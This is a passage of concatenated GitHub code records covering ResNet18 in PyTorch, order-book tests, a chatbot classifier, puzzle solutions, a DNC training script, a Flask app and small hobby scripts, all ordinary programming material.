print(\"\\n\\n\\n\\n\")\n","repo_name":"Oldranda1414/ProgettoReti","sub_path":"src/client/UDPClient.py","file_name":"UDPClient.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11890456709","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/12/11 16:34\n# @Author : zyf\n# @File : ResNet_18.py\n# @Software: PyCharm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchsummary import summary\n\n'''\n 
CNN经典网络结构复现:LeNet5、AlexNet、VGG、ResNet、InceptionNet等\n ResNet18网络结构:18 = 1(conv1) + 2*2(第一个残差部分) +2*2(第二个残差部分) +2*2(第三个残差部分) +2*2(第四个残差部分) + 1(FC)\n 需要设计一个残差块,ResBlock设计:\n 包含两个卷积层,每个卷积层后面跟一个归一化\n kernel_size = 3 卷积核大小\n stride不固定,目的是为了降采样,保证残差的维度与真正输出的维度一致\n\n 第一部分卷积conv1:\n 输入:224*224*3\n 输出:112*112*64\n conv:kernel_size = 7*7 stride=2 padding=3\n \n 输入:112*112*64\n 输出:56*56*64\n max pooling : kernel_size =3 stride=2 padding=1\n \n 第一个残差部分conv2:\n 输入:56*56*64 输出:56*56*64\n 包含两个残差块,每个残差块里面有两个卷积层\n \n 第二个残差部分conv2:\n 输入:56*56*64 输出:28*28*128\n 包含两个残差块,每个残差块里面有两个卷积层,\n 其中第一个残差块要做下采样\n 第三个残差部分conv2:\n 输入:28*28*128 输出:14*14*256\n 包含两个残差块,每个残差块里面有两个卷积层\n 其中第一个残差块要做下采样\n 第四个残差部分conv2:\n 输入:14*14*256 输出:7*7*512\n 包含两个残差块,每个残差块里面有两个卷积层\n 其中第一个残差块要做下采样\n 自定义池化和全连接层\n avg_pool\n fc \n \n 注意:其实这部分的残差块与ResNet18的结构是一样的,不过是每个残差部分的数量不一致罢了,这里分开实现纯粹是为了代码熟练度。\n ResNet18 18= 1 + 2*2 + 2*2 +2*2 +2*2 + 1\n ResNet34 34= 1 + 2*3 + 2*4 +2*6 +2*3 + 1 \n'''\n\n\n# 设计18和34残差块,ResNet18和ResNet34 用的3*3的卷积,而且每个残差块都只有两层卷积\nclass ResBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_channel, out_channel, stride=1):\n super(ResBlock, self).__init__()\n # 残差块内的第一个卷积,当stride!=1时,要进行下采样downsample\n # 例如56*56*64 -> 28*28*128 的时候要进行downsample,这时候要stride=2\n self.conv1 = nn.Conv2d(in_channels=in_channel, out_channels=out_channel, kernel_size=3, stride=stride,\n padding=1)\n # 卷积后跟的bn层\n self.bn1 = nn.BatchNorm2d(out_channel)\n # 激活函数ReLu\n self.relu = nn.ReLU(inplace=True)\n # 残差块内的第二个卷积,k=3,s=1,p=1,这个卷积层没什么变化,in_channels和out_channels 是一样的\n self.conv2 = nn.Conv2d(in_channels=out_channel, out_channels=out_channel, kernel_size=3, stride=1, padding=1)\n # 第二个bn层\n self.bn2 = nn.BatchNorm2d(out_channel)\n\n # 快捷连接设计,也就是右边x的部分,在做残差相加的时候,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n self.shortcut = None\n print(in_channel, out_channel, stride)\n # 重点部分,当残差块要进行downsample的时候,快捷连接也需要进行维度的同步,\n # 同步的方法是采用一个1*1的卷积,同时stride=2\n if stride != 1 or in_channel != out_channel:\n self.shortcut = nn.Sequential(\n # 采用1*1的卷积进行维度同步 。下采样,W*H会变小 。\n nn.Conv2d(in_channel, out_channel, kernel_size=1, stride=stride),\n nn.BatchNorm2d(out_channel)\n )\n\n # 前向传播\n def forward(self, x):\n # 残差块的右边x\n identity = x\n # 残差块计算流程\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n out = self.conv2(out)\n out = self.bn2(out)\n # 快捷连接计算的结果\n if self.shortcut is not None:\n identity = self.shortcut(x)\n # 两个结果相加\n out += identity\n out = self.relu(out)\n return out\n\n\n# 设计ResNet网络结构\nclass ResNet(nn.Module):\n def __init__(self, nums=1000):\n super(ResNet, self).__init__()\n # 分类数\n self.nums = nums\n # 第一部分卷积conv1 输入:224*224*3\n self.conv1 = nn.Sequential(\n nn.Conv2d(in_channels=3, out_channels=64, kernel_size=7, stride=2, padding=3),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n )\n # 第一个残差部分,包含两个残差块,由于没有涉及残差维度变化,两个残差块都是一样的\n self.conv2 = nn.Sequential(\n ResBlock(in_channel=64, out_channel=64),\n ResBlock(in_channel=64, out_channel=64)\n )\n # 第二个残差部分,包含两个残差块,四个卷积层\n self.conv3 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=64, out_channel=128, stride=2),\n ResBlock(in_channel=128, out_channel=128)\n )\n # 第三个残差部分,包含两个残差块,四个卷积层\n self.conv4 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=128, out_channel=256, stride=2),\n ResBlock(in_channel=256, out_channel=256)\n )\n # 第四个残差部分,包含两个残差块,四个卷积层\n self.conv5 = nn.Sequential(\n # 第一个残差块需要进行下采样,必须保证残差的维度与真正输出的维度相等(注意这里维度是宽高以及深度)\n ResBlock(in_channel=256, 
out_channel=512, stride=2),\n ResBlock(in_channel=512, out_channel=512)\n )\n # 自定义池化层,用来固定输出的size大小\n self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))\n # 定义全连接层,输出是类别数\n self.fc = nn.Linear(512, self.nums)\n\n # 前向传播\n def forward(self, x):\n # 卷积层\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n # 自定义池化,固定输出大小\n x = self.avg_pool(x)\n # 将特征向量展开\n x = torch.flatten(x, 1)\n # 全连接层\n x = self.fc(x)\n return x\n\nx = torch.rand((2,3,224,224))\nres = ResNet()\nprint(res)\nout = res(x)\nprint(out)\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nres = res.to(device)\nsummary(res, (3, 224, 224))\n","repo_name":"zyf-xtu/pytorch_models","sub_path":"cnn_models/ResNet_18.py","file_name":"ResNet_18.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"zh","doc_type":"code","stars":60,"dataset":"github-code","pt":"18"} +{"seq_id":"35752499755","text":"import logging\nimport os\nimport unittest\nimport pandas as pd\nimport numpy as np\nfrom numpy.testing import assert_array_equal\n\nfrom helper import *\nfrom l2_orderbook_tops import l2_orderbook_tops\n\nlogging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"INFO\"))\n\n\nclass TestWatch(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super(TestWatch, self).__init__(*args, **kwargs)\n\n def test_bid_watch(self):\n input_data = (\n (pd.Timestamp('2019-01-01 00:15:54'), 100.00, 0.01, 1),\n (pd.Timestamp('2019-01-01 00:16:54'), 50.05, 0.02, 1),\n (pd.Timestamp('2019-01-01 00:16:54'), 45.05, 0.02, 1)\n )\n\n df = pre_process_input(input_data)\n ret = l2_orderbook_tops.get_tops(df, watch_dollar_dist_depth=5000).values\n\n final_iteration = ret[-1]\n self.assertEqual(final_iteration[-2], 30)\n\n def test_ask_watch(self):\n input_data = (\n (pd.Timestamp('2019-01-01 00:15:54'), 100.00, 0.01, 0),\n (pd.Timestamp('2019-01-01 00:16:54'), 149.00, 0.02, 0),\n (pd.Timestamp('2019-01-01 00:16:54'), 151.00, 0.02, 0)\n )\n\n df = pre_process_input(input_data)\n ret = l2_orderbook_tops.get_tops(df, watch_dollar_dist_depth=5000).values\n\n final_iteration = ret[-1]\n self.assertEqual(final_iteration[-1], 30)\n","repo_name":"Tiergarten/l2-orderbook-tops","sub_path":"tests/test_watch.py","file_name":"test_watch.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"39976327158","text":"import json\nimport re\nimport spacy\nimport numpy as np\nfrom autocorrect import spell\nfrom copy import deepcopy\nfrom os import path\nfrom os.path import basename\n\n# the ioid of this script for JSON payload 'from'\nioid = basename(__file__) # 'hello.py'\n# Load the spacy english model\nnlp = spacy.load('en')\n\nCONVO_CLASSES_PATH = path.join(\n path.dirname(__file__), '..', '..', 'data', 'convo_classes.json')\nCONVO_CLASSES = json.load(open(CONVO_CLASSES_PATH))\n\nMIN_SIM_THRESHOLD = 0.7\n\n\ndef vectorize_queries(convo_classes):\n for topic in convo_classes:\n topic_convo = convo_classes[topic]\n topic_convo['queries_wordvecs'] = []\n for q in topic_convo['queries']:\n q_vector = nlp(q)\n topic_convo['queries_wordvecs'].append(q_vector)\n return convo_classes\n\nvectorize_queries(CONVO_CLASSES)\n\n\n# helper to clean all text before operation\ndef clean_input(text):\n # first clean out symbols\n text = re.sub(r'[^\\w]', ' ', text)\n # then tokenize\n text = text.split()\n # then correct all spellings\n text = map(spell, text)\n text = \" \".join(text)\n return text\n\n\n# 
classify a conversation (topic) using wordvec\n# return a convo copy,\n# i.e. an object in convo_classes\ndef wordvec_classify(input_str):\n input_str = clean_input(input_str)\n input_v = nlp(input_str)\n high_score = 0\n high_topic = 'exception'\n org_convo = CONVO_CLASSES['exception'] # default\n for topic in CONVO_CLASSES:\n topic_convo = CONVO_CLASSES[topic]\n local_high_score = max([\n input_v.similarity(q_v) for q_v in topic_convo['queries_wordvecs']\n ]) if topic_convo['queries_wordvecs'] else 0\n if (local_high_score > high_score and\n local_high_score > MIN_SIM_THRESHOLD):\n high_score = local_high_score\n high_topic = topic\n org_convo = topic_convo\n convo = deepcopy(org_convo)\n convo['score'] = high_score\n convo['topic'] = high_topic\n return convo\n\n\ndef compose_response(convo):\n options = convo['responses']\n response = np.random.choice(options)\n return {\n 'score': convo['score'],\n 'topic': convo['topic'],\n 'response': response\n }\n\n\n# basic way to classify convo topic\n# then reply by predefined responses in data/convo_classes.json\ndef classify_convo(input_str):\n convo = wordvec_classify(input_str)\n response_payload = compose_response(convo)\n return response_payload\n\n\n# module method for socketIO\ndef classify(msg):\n # the reply JSON payload.\n reply = {\n 'output': classify_convo(msg.get('input')),\n 'to': msg.get('from'),\n 'from': ioid,\n 'hash': msg.get('hash')\n }\n # the py client will send this to target \n return reply\n","repo_name":"kengz/aiva","sub_path":"lib/py/convo_classifier.py","file_name":"convo_classifier.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":808,"dataset":"github-code","pt":"18"} +{"seq_id":"12749441054","text":"import functools\nimport itertools\nimport re\n\nfrom sympy.core import numbers\n\nimport utils\n\n\nREVERSE_RE = r'deal into new stack'\nCUT_RE = r'cut (-?\\d+)'\nINCREMENT_RE = r'deal with increment (\\d+)'\n\n\n@functools.lru_cache(maxsize=None)\ndef inverse(n, k):\n return numbers.mod_inverse(k, n)\n\n\ndef mod(n, *coeffs):\n return tuple(coeff % n for coeff in coeffs)\n\n\nCOEFFS = {\n REVERSE_RE: lambda n, a, b: mod(n, -1 * a, -1 * b - 1),\n CUT_RE: lambda n, k, a, b: mod(n, a, b - k),\n INCREMENT_RE: lambda n, k, a, b: mod(n, a * k, b * k),\n}\n\nINV_COEFFS = {\n REVERSE_RE: lambda n, a, b: mod(n, -1 * a, -1 * b - 1),\n CUT_RE: lambda n, k, a, b: mod(n, a, b + k),\n INCREMENT_RE: lambda n, k, a, b: mod(n, a * inverse(n, k), b * inverse(n, k)),\n}\n\n\ndef get_coeffs(n, techniques, reverse=False):\n if reverse:\n techniques = techniques[::-1]\n coeff_map = INV_COEFFS\n else:\n coeff_map = COEFFS\n\n coeffs = (1, 0)\n for technique in techniques:\n for regex, method in coeff_map.items():\n match = re.match(regex, technique)\n if match:\n coeffs = method(*itertools.chain(\n [n],\n [int(arg) for arg in match.groups()],\n coeffs,\n ))\n\n return coeffs\n\n\ndef shuffle(n, card, rounds=1, reverse=False):\n techniques = utils.get_input(delimiter=None, cast=str)\n a, b = get_coeffs(n, techniques, reverse=reverse)\n return (\n pow(a, rounds, n) * card +\n b * (pow(a, rounds, n) - 1) * inverse(n, a - 1)\n ) % n\n\n\n@utils.part\ndef part_1():\n print(shuffle(10007, 2019))\n\n\n@utils.part\ndef part_2():\n print(shuffle(119315717514047, 2020, rounds=101741582076661, 
reverse=True))\n","repo_name":"alexander-yu/adventofcode","sub_path":"problems_2019/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"5238175569","text":"from turtle import Turtle, Screen\n\ntimmy = Turtle()\ntimmy.shape('turtle')\ntimmy.color('red')\n\n#draw a square \nfor _ in range(4):\n timmy.forward(100)\n timmy.right(90)\n\n \nscreen = Screen()\nscreen.exitonclick()\n","repo_name":"kmshravani/100DaysofCode","sub_path":"Day 18/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"7112812365","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n if not s:\n return 0\n dp = [[0 for i in range(len(s))] for j in range(len(s))]\n for i in range(len(s)):\n dp[i][i] = 1\n max_l = 1\n for r in range(2, len(s)+1):\n for i in range(len(s)-r+1):\n j = i + r - 1\n p1,p2 = 0,0\n if dp[i][j-1] == len(s[i:j]) and s[j] not in s[i:j]:\n p1 = dp[i][j-1]+1\n if dp[i+1][j] == len(s[i+1:j+1]) and s[i] not in s[i+1:j+1]:\n p2 = dp[i+1][j] + 1\n dp[i][j] = max(p1, p2, dp[i][j-1], dp[i+1][j])\n max_l = max(max_l, dp[i][j])\n # for d in dp:\n # print(d)\n # print(max_l)\n return max_l\n\n def lengthOfLongestSubstring1(self, s: str) -> int:\n i = 0\n max_l = 0\n while i < len(s):\n j = i + 1\n index_dic = {s[i]: i}\n while j < len(s) and s[j] not in index_dic:\n index_dic[s[j]] = j\n j += 1\n max_l = max(max_l, j-i)\n if j < len(s):\n i = index_dic[s[j]]+1\n else:\n break\n return max_l\n\n def lengthOfLongestSubstring2(self, s: str) -> int:\n occ = set()\n n = len(s)\n # right pointer, initialized to -1, i.e. just left of the string's left boundary, before any movement\n rk, ans = -1, 0\n for i in range(n):\n if i != 0:\n # move the left pointer one step right, removing one character\n occ.remove(s[i - 1])\n while rk + 1 < n and s[rk + 1] not in occ:\n # keep moving the right pointer\n occ.add(s[rk + 1])\n rk += 1\n # characters i through rk form a maximal substring without repeated characters\n ans = max(ans, rk - i + 1)\n return ans\n\n def lengthOfLongestSubstring3(self, s: str) -> int:\n i = 0\n j = 1\n max_l = 1\n index_dic = {s[0]:0}\n while i < len(s):\n while j < len(s) and s[j] not in index_dic:\n index_dic[s[j]] = j\n j += 1\n max_l = max(max_l, j-i)\n if j < len(s):\n new_i = index_dic[s[j]] + 1\n for k in range(i, new_i):\n index_dic.pop(s[k])\n i = new_i\n else:\n break\n return max_l\nif __name__ == '__main__':\n s = \"pwwkew\"\n s = \"abcabcbb\"\n a = Solution()\n a.lengthOfLongestSubstring3(s)\n\n","repo_name":"longkun-uestc/examination","sub_path":"力扣网/3-无重复字符的最长子串.py","file_name":"3-无重复字符的最长子串.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12088384145","text":"\"\"\"Example script to train the DNC on a repeated copy task.\"\"\"\nimport os\nimport argparse\nimport logging\n\nimport torch\nfrom dnc.repeat_copy import RepeatCopy\nfrom dnc.dnc import DNC\n\n_LG = logging.getLogger(__name__)\n\n\ndef _main():\n args = _parse_args()\n logging.basicConfig(level=logging.INFO, format=\"%(asctime)s: %(message)s\")\n\n dataset = RepeatCopy(\n args.num_bits,\n args.batch_size,\n args.min_length,\n args.max_length,\n args.min_repeats,\n args.max_repeats,\n )\n\n dnc = DNC(\n access_config={\n \"memory_size\": args.memory_size,\n \"word_size\": args.word_size,\n \"num_reads\": args.num_read_heads,\n \"num_writes\": args.num_write_heads,\n },\n controller_config={\n \"input_size\": args.num_bits + 
2 + args.num_read_heads * args.word_size,\n \"hidden_size\": args.hidden_size,\n },\n output_size=dataset.target_size,\n clip_value=args.clip_value,\n ).to(args.device)\n\n optimizer = torch.optim.RMSprop(dnc.parameters(), lr=args.lr, eps=args.eps)\n\n _run_train_loop(\n dnc,\n dataset,\n optimizer,\n args.num_training_iterations,\n args.report_interval,\n args.checkpoint_interval,\n args.checkpoint_dir,\n args.device,\n )\n\n\ndef _run_train_loop(\n dnc,\n dataset,\n optimizer,\n num_training,\n report_interval,\n checkpoint_interval,\n checkpoint_dir,\n device,\n):\n total_loss = 0\n for i in range(num_training):\n batch = dataset(device=device)\n state = None\n outputs = []\n for inputs in batch.observations:\n output, state = dnc(inputs, state)\n outputs.append(output)\n outputs = torch.stack(outputs, 0)\n loss = dataset.cost(outputs, batch.target, batch.mask)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n total_loss += loss.item()\n if (i + 1) % report_interval == 0:\n outputs = torch.round(batch.mask.unsqueeze(-1) * torch.sigmoid(outputs))\n dataset_string = dataset.to_human_readable(batch, outputs)\n _LG.info(f\"{i}: Avg training loss {total_loss / report_interval}\")\n _LG.info(dataset_string)\n total_loss = 0\n if checkpoint_interval is not None and (i + 1) % checkpoint_interval == 0:\n path = os.path.join(checkpoint_dir, \"model.pt\")\n torch.save(dnc.state_dict(), path)\n\n\ndef _parse_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=__doc__,\n )\n model_opts = parser.add_argument_group(\"Model Parameters\")\n model_opts.add_argument(\n \"--hidden-size\", type=int, default=64, help=\"Size of LSTM hidden layer.\"\n )\n model_opts.add_argument(\n \"--memory-size\", type=int, default=16, help=\"The number of memory slots.\"\n )\n model_opts.add_argument(\n \"--word-size\", type=int, default=16, help=\"The width of each memory slot.\"\n )\n model_opts.add_argument(\n \"--num-write-heads\", type=int, default=1, help=\"Number of memory write heads.\"\n )\n model_opts.add_argument(\n \"--num-read-heads\", type=int, default=4, help=\"Number of memory read heads.\"\n )\n model_opts.add_argument(\n \"--clip-value\",\n type=float,\n default=20,\n help=\"Maximum absolute value of controller and dnc outputs.\",\n )\n\n optim_opts = parser.add_argument_group(\"Optimizer Parameters\")\n optim_opts.add_argument(\n \"--max-grad-norm\", type=float, default=50, help=\"Gradient clipping norm limit.\"\n )\n optim_opts.add_argument(\n \"--learning-rate\",\n \"--lr\",\n type=float,\n default=1e-4,\n dest=\"lr\",\n help=\"Optimizer learning rate.\",\n )\n optim_opts.add_argument(\n \"--optimizer-epsilon\",\n type=float,\n default=1e-10,\n dest=\"eps\",\n help=\"Epsilon used for RMSProp optimizer.\",\n )\n\n task_opts = parser.add_argument_group(\"Task Parameters\")\n task_opts.add_argument(\n \"--batch-size\", type=int, default=16, help=\"Batch size for training\"\n )\n task_opts.add_argument(\n \"--num-bits\", type=int, default=4, help=\"Dimensionality of each vector to copy\"\n )\n task_opts.add_argument(\n \"--min-length\",\n type=int,\n default=1,\n help=\"Lower limit on number of vectors in the observation pattern to copy\",\n )\n task_opts.add_argument(\n \"--max-length\",\n type=int,\n default=2,\n help=\"Upper limit on number of vectors in the observation pattern to copy\",\n )\n task_opts.add_argument(\n \"--min-repeats\",\n type=int,\n default=1,\n help=\"Lower limit on number of copy repeats.\",\n )\n 
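# Illustrative invocation (not part of the original script): python train.py --min-repeats 1 --max-repeats 3\n # trains with 1 to 3 copy repeats per sample, using the flags defined below.\n 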
task_opts.add_argument(\n \"--max-repeats\",\n type=int,\n default=2,\n help=\"Upper limit on number of copy repeats.\",\n )\n\n train_opts = parser.add_argument_group(\"Training Options\")\n train_opts.add_argument(\n \"--device\",\n type=torch.device,\n default=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n help=\"Device to perform the training.\",\n )\n train_opts.add_argument(\n \"--num-training-iterations\",\n type=int,\n default=100_000,\n help=\"Number of iterations to train for.\",\n )\n train_opts.add_argument(\n \"--report-interval\",\n type=int,\n default=100,\n help=\"Iterations between reports (samples, valid loss).\",\n )\n train_opts.add_argument(\n \"--checkpoint-dir\", default=None, help=\"Checkpointing directory.\"\n )\n train_opts.add_argument(\n \"--checkpoint-interval\",\n type=int,\n default=None,\n help=\"Checkpointing step interval.\",\n )\n args = parser.parse_args()\n\n if args.checkpoint_dir is None and args.checkpoint_interval is not None:\n raise RuntimeError(\n \"`--checkpoint-interval` is provided but `--checkpoint-dir` is not provided.\"\n )\n if args.checkpoint_dir is not None and args.checkpoint_interval is None:\n raise RuntimeError(\n \"`--checkpoint-dir` is provided but `--checkpoint-interval` is not provided.\"\n )\n return args\n\n\nif __name__ == \"__main__\":\n _main()\n","repo_name":"mthrok/dnc_pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"28698725430","text":"'''\nHow to subclass an immutable built-in type and customize its instantiation\n'''\n\nclass IntTuple(tuple): # behaves exactly like a plain tuple\n def __init__(self,iterable):\n super(IntTuple,self).__init__(iterable)\n\n'''How list('abc') translates into __new__ and __init__'''\nlist('abc') # the next two lines combined are equivalent to list('abc')\n\nl=list.__new__(list,'abc')\nlist.__init__(l,'abc')\nprint(l)\n\n'''Using the __new__ method'''\nclass IntTuple(tuple):\n def __new__(cls, iterable):\n g=(x for x in iterable if isinstance(x,int) and x>0)\n # return super().__new__(cls, g)\n return super(IntTuple,cls).__new__(cls,g) # same as the commented line above\n\nt=IntTuple([1,-1,'abc',6,['x','y'],3])\nprint(t)","repo_name":"Air-Zhuang/Test35","sub_path":"High_Level_Coding_python3/7/7_1.py","file_name":"7_1.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25097888646","text":"import numpy as np\nimport pytest\nimport torch\nfrom jina import Document, DocumentArray\n\nfrom finetuner import __default_tag_key__\nfrom finetuner.tuner.evaluation import (\n METRICS,\n Evaluator,\n __evaluator_metrics_key__,\n __evaluator_targets_key__,\n)\n\nDATASET_SIZE = 1000\nEMBEDDING_SIZE = 10\n\n\nclass EmbeddingModel(torch.nn.Module):\n @staticmethod\n def forward(inputs):\n return inputs.repeat(1, 10)\n\n\n@pytest.fixture\ndef embed_model():\n \"\"\"The embedding model\"\"\"\n return EmbeddingModel()\n\n\n@pytest.fixture\ndef query_session_data():\n \"\"\"The query data in session format\"\"\"\n data = DocumentArray()\n for i in range(DATASET_SIZE):\n doc = Document(\n id=str(i),\n blob=np.array([i]),\n matches=[Document(id=str(DATASET_SIZE + i))],\n )\n data.append(doc)\n return data\n\n\n@pytest.fixture\ndef index_session_data():\n \"\"\"The index data in session format\"\"\"\n return DocumentArray(\n [\n Document(id=str(DATASET_SIZE + i), blob=np.array([i]))\n for i in range(DATASET_SIZE)\n ]\n )\n\n\n@pytest.fixture\ndef query_class_data():\n \"\"\"The query data in class format\"\"\"\n return DocumentArray(\n 
Document(id=str(i), blob=np.array([i]), tags={__default_tag_key__: str(i)})\n for i in range(DATASET_SIZE)\n )\n\n\n@pytest.fixture\ndef index_class_data():\n \"\"\"The index data in class format\"\"\"\n return DocumentArray(\n Document(\n id=str(DATASET_SIZE + i),\n blob=np.array([i]),\n tags={__default_tag_key__: str(i)},\n )\n for i in range(DATASET_SIZE)\n )\n\n\ndef test_parse_session_docs(query_session_data, index_session_data):\n \"\"\"\n Test the conversion from session docs to the internal evaluator representation\n \"\"\"\n evaluator = Evaluator(query_session_data, index_session_data)\n summarydocs = evaluator._parse_session_docs()\n for evaldoc, summarydoc in zip(query_session_data, summarydocs):\n assert evaldoc.id == summarydoc.id\n assert summarydoc.content is None\n assert evaldoc.matches[0].id in summarydoc.tags[__evaluator_targets_key__]\n assert summarydoc.tags[__evaluator_targets_key__][evaldoc.matches[0].id] == 1\n\n\ndef test_parse_class_docs(query_class_data, index_class_data):\n \"\"\"\n Test the conversion from class docs to the internal evaluator representation\n \"\"\"\n evaluator = Evaluator(query_class_data, index_class_data)\n summarydocs = evaluator._parse_class_docs()\n for evaldoc, summarydoc in zip(query_class_data, summarydocs):\n assert evaldoc.id == summarydoc.id\n assert summarydoc.content is None\n targets = list(summarydoc.tags[__evaluator_targets_key__].items())\n assert len(targets) == 1\n target, relevance = targets[0]\n assert relevance == 1\n\n\ndef test_list_available_metrics(embed_model):\n \"\"\"\n Test the listing of available metrics\n \"\"\"\n assert Evaluator.list_available_metrics() == list(METRICS.keys())\n\n\ndef test_evaluator_perfect_scores(\n embed_model,\n query_session_data,\n index_session_data,\n query_class_data,\n index_class_data,\n):\n \"\"\"\n Test the evaluator when the matching limit is set 1. We expect all metrics == 1.0\n \"\"\"\n # test both for session and class data\n for _query_data, _index_data in [\n (query_session_data, index_session_data),\n (query_class_data, index_class_data),\n ]:\n evaluator = Evaluator(_query_data, _index_data, embed_model)\n metrics = evaluator.evaluate(label='foo', limit=1, distance='euclidean')\n print(metrics)\n for _, v in metrics.items():\n assert v == 1.0\n for doc in _query_data:\n for _, v in doc.tags[__evaluator_metrics_key__]['foo'].items():\n assert v == 1.0\n\n\ndef test_evaluator_half_precision(\n embed_model,\n query_session_data,\n index_session_data,\n query_class_data,\n index_class_data,\n):\n \"\"\"\n Test the evaluator when the matching limit is set 2. 
We expect all metrics == 1.0 except\n precision == 0.5 and f1score == 2/3\n \"\"\"\n # test both for session and class data\n for _query_data, _index_data in [\n (query_session_data, index_session_data),\n (query_class_data, index_class_data),\n ]:\n evaluator = Evaluator(_query_data, _index_data, embed_model)\n metrics = evaluator.evaluate(label='foo', limit=2, distance='euclidean')\n for k, v in metrics.items():\n if k == 'precision_at_k':\n assert v == 0.5\n elif k == 'f1_score_at_k':\n assert 0.66 < v < 0.67\n else:\n assert v == 1.0\n for doc in _query_data:\n for k, v in doc.tags[__evaluator_metrics_key__]['foo'].items():\n if k == 'precision_at_k':\n assert v == 0.5\n elif k == 'f1_score_at_k':\n assert 0.66 < v < 0.67\n else:\n assert v == 1.0\n\n\ndef test_evaluator_no_index_data(embed_model, query_class_data):\n \"\"\"\n Test the evaluator when no index data are given\n \"\"\"\n evaluator = Evaluator(query_class_data, embed_model=embed_model)\n _ = evaluator.evaluate()\n","repo_name":"ajjurcom/finetuner","sub_path":"tests/unit/tuner/test_evaluation.py","file_name":"test_evaluation.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"17036768259","text":"from flask import Flask, render_template, url_for\nfrom . import *\n\n\napp = Flask(__name__)\napp.config.from_object('config')\n\n@app.route('/')\n@app.route('/index/')\ndef index():\n return render_template('index.html')\n@app.route('/result/')\ndef result():\n description = \"\"\"\n You are not afraid of being alone! Wide-open spaces and adventures are made for you. In fact, Koh Lanta is your favorite TV show! Soon you will set off on your raft with the wind in your hair. You are also a seasoned idealist. How lucky you are!\n \"\"\"\n return render_template('result.html', user_name = \"eder\", user_image=url_for('static', filename='tmp/cover_111823112767411.jpg'),\n description=description, blur=True)\n\n\nif __name__ == \"__main__\":\n app.run(port=8012)","repo_name":"Nicolas-Turck/flask1","sub_path":"fbapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14683758092","text":"from scene import *\nfrom Draw_line import my_line\nfrom sound import play_effect\n\n\npic = Texture('mou1.JPG')\nfont = ('Apple Color Emoji',25)\nclass myscene(Scene) :\n\tdef setup(self) :\n\t\tself.background_color = '#f868ff'\n\t\t\n\t\tself.pic_node = SpriteNode(pic,parent=self)\n\t\tself.pic_node.anchor_point=(0.5,0.5)\n\t\tself.pic_node.position=(self.size.w/2,self.size.h/2)\n\t\tself.pic_node.scale=0.5\n\t\t\n\t\tline,pos=my_line(100,100,300,300)\n\t\tself.lin_node = ShapeNode(line,stroke_color='#6875ff',parent=self)\n\t\tself.lin_node.position=pos\n\t\t\n\t\tself.txt_node = LabelNode('Hello,this is stan',font,parent=self)\n\t\tself.txt_node.position = (self.size.w/2,4*self.size.h/5)\n\t\tself.txt_node.color='#ff4646'\n\t\t\n\tdef touch_moved(self,touch) :\n\t\tx,y=touch.location\n\t\tself.pic_node.position=touch.location\n\t\tplay_effect('8ve:8ve-slide-network',2)\n\t\t\n\t\t\n\tdef touch_began(self,touch) :\n\t\tself.txt_node.position=touch.location\n\t\tplay_effect('digital:HighDown',0.1)\n\tdef touch_ended(self,touch) :\n\t\tself.lin_node.position=touch.location\n\t\tplay_effect('digital:HighUp',0.5)\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\nrun(myscene(),PORTRAIT,show_fps=True)\n","repo_name":"stan12138/archive","sub_path":"script/pythonista/scene_example.py","file_name":"scene_example.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"73040974119","text":"import pandas as pd\nimport argparse\n\ndef main(args):\n df = pd.read_csv(args.csv_path)\n m = df.value_counts([\"brand\", \"model\"])\n print(type(m))\n m.to_csv(args.result)\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv_path', type=str, help='path of csv file ', default='/home/hanieh/car/bama.csv')\n 